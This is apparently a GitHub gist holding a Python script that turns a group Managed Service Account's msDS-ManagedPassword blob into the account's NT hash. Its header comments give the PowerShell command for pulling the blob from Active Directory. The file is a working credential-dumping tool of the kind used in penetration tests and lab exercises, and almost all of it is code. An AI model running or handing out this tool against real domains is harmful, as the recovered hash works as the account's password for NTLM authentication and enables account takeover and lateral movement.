
@xct

xct/dump.py Secret

Last active August 29, 2022 09:30
gMSA Local Dump
#!/usr/bin/env python3
# script based on https://github.com/micahvandeusen/gMSADumper/blob/main/gMSADumper.py
# 1. Get Blob: (Get-ADServiceAccount -Identity 'account_name' -Properties 'msDS-ManagedPassword').'msDS-ManagedPassword'
# 2. Line breaks to commas: https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5C%5Cn'%7D,',',true,false,true,false)
# 3. Paste the resulting comma-separated byte values into the `data` list below
from ldap3 import ALL, Server, Connection, NTLM, SASL, KERBEROS, extend, SUBTREE
import argparse
import binascii
from Cryptodome.Hash import MD4
from impacket.ldap.ldaptypes import ACE, ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, LDAP_SID, SR_SECURITY_DESCRIPTOR
from impacket.structure import Structure
import sys
# Placeholder: replace `[...]` with the integer byte values (0-255) of the
# msDS-ManagedPassword blob. Left unchanged, the bytes() call below raises
# TypeError, because the list then contains only the Ellipsis object.
data = [...]
# Turn the list of integers into the raw byte string that is parsed further down.
data = bytes(data)
class MSDS_MANAGEDPASSWORD_BLOB(Structure):
    """Parser for the value of a gMSA's msDS-ManagedPassword attribute.

    The blob starts with a fixed header (version, reserved, total length)
    followed by four 16-bit offsets. Each offset is used below as a byte
    position, counted from the start of the blob, at which one of the
    variable-length fields begins.
    """

    structure = (
        ('Version', '<H'),
        ('Reserved', '<H'),
        ('Length', '<L'),
        ('CurrentPasswordOffset', '<H'),
        ('PreviousPasswordOffset', '<H'),
        ('QueryPasswordIntervalOffset', '<H'),
        ('UnchangedPasswordIntervalOffset', '<H'),
        # The ':' fields are placeholders; fromString() overwrites them with
        # slices taken at the offsets above.
        ('CurrentPassword', ':'),
        ('PreviousPassword', ':'),
        # ('AlignmentPadding', ':'),
        ('QueryPasswordInterval', ':'),
        ('UnchangedPasswordInterval', ':'),
    )

    def __init__(self, data=None):
        """Create the structure, forwarding *data* to the base class."""
        super().__init__(data=data)

    def fromString(self, data):
        """Parse *data* and fill the variable-length fields from their offsets.

        No bounds checking is done on the offsets: a truncated or malformed
        blob yields short or empty fields rather than an error.
        """
        super().fromString(data)

        raw = self.rawData
        current_off = self['CurrentPasswordOffset']
        previous_off = self['PreviousPasswordOffset']
        query_off = self['QueryPasswordIntervalOffset']
        unchanged_off = self['UnchangedPasswordIntervalOffset']

        # A zero PreviousPasswordOffset means there is no previous password,
        # so the current password runs up to the query-interval field.
        has_previous = previous_off != 0
        current_end = previous_off if has_previous else query_off

        self['CurrentPassword'] = raw[current_off:][:current_end - current_off]
        if has_previous:
            self['PreviousPassword'] = raw[previous_off:][:query_off - previous_off]

        self['QueryPasswordInterval'] = raw[query_off:][:unchanged_off - query_off]
        # The last field extends to the end of the blob.
        self['UnchangedPasswordInterval'] = raw[unchanged_off:]
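# Parse the pasted blob into its fields.
blob = MSDS_MANAGEDPASSWORD_BLOB()
blob.fromString(data)

# CurrentPassword is a UTF-16 string with a two-byte null terminator; the
# terminator is dropped before hashing. MD4 over those bytes is the NT hash.
# The object is named `md4` so that the builtin hash() is not shadowed.
md4 = MD4.new()
md4.update(blob['CurrentPassword'][:-2])

# The NT hash is password-equivalent for NTLM authentication, so this output
# should be handled like the account's credential: keep it out of logs,
# transcripts and shared terminals.
nt_hash = md4.hexdigest()
print(nt_hash)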